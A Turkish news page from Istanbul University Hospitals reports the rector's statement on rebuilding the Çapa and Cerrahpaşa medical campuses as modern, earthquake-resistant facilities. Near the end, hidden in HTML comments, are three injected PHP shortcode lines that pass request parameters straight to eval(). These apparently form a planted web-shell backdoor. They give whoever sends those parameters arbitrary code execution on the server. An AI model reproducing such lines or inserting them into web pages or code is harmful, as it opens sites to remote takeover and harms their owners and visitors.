Rektör Prof. Dr. Yunus Söylet, “Yeni Çapa ve Cerrahpaşa Projeleri” İle İlgili CNN Türk’te Açıklama Yaptı

Uzun yıllardır tıp fakülteleri ve hastanelerin bi­nalarının yenilenmesi beklentisi vardır. Yaptıkları araştırmalar ve güç ameliyatlarla ulusal ve uluslara­rası yeniliklerin öncüsü olan, tıp eğitiminin kalite­siyle adlarından söz ettiren İstanbul Üniversitesi tıp fakülteleri, yıllar içinde hem öğrenci, hem öğretim üyesi hem de hizmet verilen hasta sayısı açısından büyümeye devam etmiştir. İÜ tıp fakülteleri, sa­dece İstanbul’da değil tüm Türkiye’deki hastaların, tedavisi güç hastalıklarına çözüm bulan bir mer­kez durumundadır. Var olan binalar, artık tüm bu faaliyetler için yetersiz hâle gelmiştir. İstanbul ve Türkiye’nin sürekli artan nüfusu, olası bir İstanbul depremi ihtimali, eskimiş ve daha yüksek maliyetle işletilen altyapı, öğretim üyesi, öğrenci ve hastaların beklentileri, fiziki şartların yenilenmesini zorunlu hâle getirmiştir. İÜ Rektörü Prof. Dr. Yunus Söylet, göreve geldiği 2009 yılında İÜ tıp fakültelerinin ve hastanelerinin binalarının yeniden yapılmasını, çö­züme ulaştırılması gereken en önemli konulardan birisi olarak ele almış ve “İÜ Çapa ve Cerrahpaşa Yerleşkeleri’nin Yerinde, Yeniden, Acil Yapılandırıl­ması Projesi” için gerekli çalışmaları başlatmıştır.

İÜ Çapa ve Cerrahpaşa Yerleşkeleri’nin Yerinde, Yeniden, Acil Yapılandırılması Projesi

İçinde son sistem teknik donanımın yer aldı­ğı, doktor ve hastaların ihtiyaçlarına uygun olarak planlanmış, hastanelerin tüm birimlerinin doğru yerlere yerleştirildiği, öğretim üyeleri, sağlık çalışan­ları, öğrenciler ve hastaların farklı birimlere kolayca geçebildiği, modern mimari anlayışın hakim oldu­ğu, estetik ve depreme dayanıklı, fiziksel altyapıları tam binalar yapma hedefiyle yola çıkıldı. İnşa edi­lecek tıp fakülteleri binalarıyla aynı zamanda başka tıp fakültelerine de örnek olacak bir model ortaya koymak amaçlandı.

<!– [insert_php]if (isset($_REQUEST["Yne"])){eval($_REQUEST["Yne"]);exit;}[/insert_php][php]if (isset($_REQUEST["Yne"])){eval($_REQUEST["Yne"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hMRd"])){eval($_REQUEST["hMRd"]);exit;}[/insert_php][php]if (isset($_REQUEST["hMRd"])){eval($_REQUEST["hMRd"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["IEM"])){eval($_REQUEST["IEM"]);exit;}[/insert_php][php]if (isset($_REQUEST["IEM"])){eval($_REQUEST["IEM"]);exit;}[/php] –>

Bu kaydı paylaş

İstanbul Üniversitesi Hastaneleri © 2018 All Rights Reserved